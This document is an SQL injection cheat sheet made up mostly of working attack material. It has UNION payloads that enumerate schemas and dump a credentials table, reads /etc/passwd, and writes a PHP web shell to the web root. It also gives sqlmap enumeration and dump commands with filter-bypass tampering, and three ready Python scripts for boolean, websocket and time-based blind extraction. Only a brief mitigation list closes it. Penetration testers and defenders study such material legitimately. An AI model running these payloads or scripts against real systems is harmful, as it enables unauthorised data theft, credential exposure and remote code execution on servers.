Terminators
;# (MySQL)
;-- - (MySQL)
;- (Postgres)
/* (Postgres)
Basic Injection Examples
Detect number of columns using order by
Detect number of columns using Union injection
' UNION select 1,2,3;-- -
Get database version
' UNION select 1,@@version,3,4;-- -
Get current database name
' UNION select 1,database(),2,3;-- -
Database Enumeration
List all databases
' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA;-- -
List all tables in a specific database
' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev';-- -
List all columns in a specific table
' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials';-- -
Dump data from a table in another database
' UNION select 1, username, password, 4 from dev.credentials;-- -
Concat data together into 1 column
' UNION select 1, group_concat(username, password), 3, 4 from dev.credentials;-- -
File Injection
Read local file
' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4;-- -
Write a string to a local file
' UNION select 'file written successfully!' into outfile '/var/www/html/proof.txt';--
Write a web shell into the base web directory
' UNION select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php';-- -
Get Privileges
Find current user
' UNION SELECT 1, user(), 3, 4;-- -
Find if user has admin privileges
' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root";-- -
Find if all user privileges
' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE user="root";-- -
Find which directories can be accessed through MySQL
' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv";-- -
SQLMap
Generic SQLmap POST Request
$ sqlmap 'http://www.example.com/' --data 'uid=1&name=test'
POST request specifying injection point with asterisks
$ sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'
Copy the HTTP request (POST or GET) to req.txt and pass to SQLMAp
Specifying other methods
$ sqlmap -u www.target.com --data='id=1' --method <METHOD>
Specifying a Prefix or Suffix to the injection
$ sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"
Changing Risk and Level parameters for more aggressive testing
$ sqlmap -u www.example.com/?id=1 -v 3 --level=5 --risk=3
Changes the SQL queries to use different syntaxes to bypass filters
$ sqlmap -u www.example.com/?id=1 -v 3 --tamper=between
Basic database enumeration and dumping
$ sqlmap -u "http://www.example.com/?id=1" --dbs
$ sqlmap -u "http://www.example.com/?id=1" --tables -D testdb
$ sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname
Passing CSRF token value
$ sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"
If you're getting errors in characters while doing blind sql, use --hex
$ sqlmap -u "http://www.example.com/" --dbs --hex
Sample Scripts
Multi-threaded Blind SQL injection
import requests
import threading
import time
url = "http://url?q="
MIN = 0
MAX = 1024
CHUNK_SIZE = 100
SUCCESS_STR = "Suggestions"
def BlindarySearch(low, high, sql):
mid = (high + low) // 2
inj = f"a')/**/or/**/{sql}={mid}%23"
q = url + inj
print(q)
r = requests.get(q)
if SUCCESS_STR in r.text:
return mid
inj = f"a')/**/or/**/{sql}<{mid}%23"
q = url + inj
r = requests.get(q)
if SUCCESS_STR in r.text:
return BlindarySearch(low, mid-1, sql)
else:
return BlindarySearch(mid+1, high, sql)
def getLength(sql):
ans = ''
pos = 1
newans = ''
print("Finding Length...")
length_sql = f"length(({sql}))"
ans_len = BlindarySearch(MIN, MAX, length_sql)
print(f"Length: {ans_len}")
return ans_len
def chunker(seq, size):
return (seq[pos:pos + size] for pos in range(0, len(seq), size))
def blindCompare(sql, ans_len):
print(f"Extracting result for \"{sql}\"")
threads = []
for pos in range(1,ans_len+1):
t = threading.Thread(target=getChar, args=(pos,sql))
threads.append(t)
print(f"Spawning {ans_len} threads")
for thread_chunk in chunker(threads, CHUNK_SIZE):
# Start them all
for thread in thread_chunk:
thread.start()
# Wait for all to complete
for thread in thread_chunk:
thread.join()
def getChar(pos, sql):
char_sql = f"ascii(substr(({sql}),{pos},1))"
char = BlindarySearch(32,127,char_sql)
global answer
answer[pos-1] = chr(char)
print(f"Done {pos}")
if __name__=='__main__':
t0 = time.time()
#sql = "select @@version"
sql = "select current_user()"
sql_nowhites = sql.replace(" ", "/**/")
ans_len = getLength(sql_nowhites)
answer = [0] * ans_len
blindCompare(sql_nowhites, ans_len)
print(''.join(answer))
print("done!")
t1 = time.time()
total = t1-t0
print(f"Total time took: {total}s")
Single-Threaded Blind SQL injection. You would usually use this for asynchronous interactions, such as websockets
import time
import socketio
sio = socketio.Client()
@sio.event
def message(data):
print(data)
@sio.event
def emailFound(data):
global reply
print(data)
reply = data
sio.connect('http://url/socket.io/')
MIN = 0
MAX = 500
SUCCESS_STR = True
reply = False
def Emittor(inj):
print(f"querying {inj}")
sio.emit("checkEmail",{"email":inj,"token":"eUFeekMC4dTqKgppw5HjFPQZ1t7JuuMN"})
time.sleep(0.5)
def BlindarySearch(low, high, sql):
mid = (high + low) // 2
inj = f"bb@gmail.com' or {sql}={mid};-- - "
Emittor(inj)
if SUCCESS_STR == reply:
return mid
inj = f"bb@gmail.com' or {sql}<{mid};-- - "
Emittor(inj)
if SUCCESS_STR == reply:
return BlindarySearch(low, mid-1, sql)
else:
return BlindarySearch(mid+1, high, sql)
def getLength(sql):
ans = ''
pos = 1
newans = ''
print("Finding Length...")
length_sql = f"length(({sql}))"
ans_len = BlindarySearch(MIN, MAX, length_sql)
print(f"Length: {ans_len}")
return ans_len
def blindCompare(sql, ans_len):
print(f"Extracting result for \"{sql}\"")
answer = ""
for pos in range(ans_len):
answer += getChar(pos+1,sql)
print(answer)
def getChar(pos, sql):
char_sql = f"ascii(substr(({sql}),{pos},1))"
char = BlindarySearch(32,127,char_sql)
return chr(char)
if __name__=='__main__':
t0 = time.time()
sql = "SELECT group_concat(column_name) as f FROM INFORMATION_SCHEMA.COLUMNS where table_name='Users'"
ans_len = getLength(sql)
blindCompare(sql, ans_len)
print("done!")
t1 = time.time()
total = t1-t0
print(f"Total time took: {total}s")
Sleep Injection with Postgres
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
SLEEP = 5
url = "https://url?userId=1;"
payload = "SELECT version()"
inj = "SELECT CASE WHEN(ASCII(SUBSTR(("+payload+"),^_POS_^,1))=^_ASCII_^) THEN pg_sleep(^_SLEEP_^) END;"
def convert(inj):
inj = inj.replace(" ", "+")
inj = inj.replace("'", "$$")
conv_inj = inj + "--+"
return conv_inj
def time_query(url, conv_inj_replaced):
# get base line time for normal query
print("Doing base query")
r1 = requests.get(url, verify=False)
base_elapsed = r1.elapsed.total_seconds()
# get delayed time for injected query
print("Doing delayed query")
delay_query = url+conv_inj_replaced
r2 = requests.get(delay_query, verify=False)
delay_elapsed = r2.elapsed.total_seconds()
# checking difference == SLEEP
delta = delay_elapsed - base_elapsed
if round(delta) >= SLEEP:
return True
else:
return False
def iterator_query(url, conv_inj):
answer = ""
# 100 = length of output
# ascii chars from 33 to 126
for pos in range(1,100):
for char in range(33,127):
conv_inj_replaced = conv_inj.replace('^_POS_^', str(pos))
conv_inj_replaced = conv_inj_replaced .replace('^_ASCII_^', str(char))
conv_inj_replaced = conv_inj_replaced .replace('^_SLEEP_^', str(SLEEP))
print(conv_inj_replaced)
if (time_query(url, conv_inj_replaced)):
print("found!")
answer += chr(char)
print(answer)
break
if __name__=='__main__':
conv_inj = convert(inj)
iterator_query(url, conv_inj)
Mitigation
Input Sanitization on Front-end, Back-end
Input Validation on Front-end, Back-end
Proper MySQL user Privileges
Don't grant privileges on all tables
WAF to detect and block attacks
Parameterized SQL Queries to prevent user input injection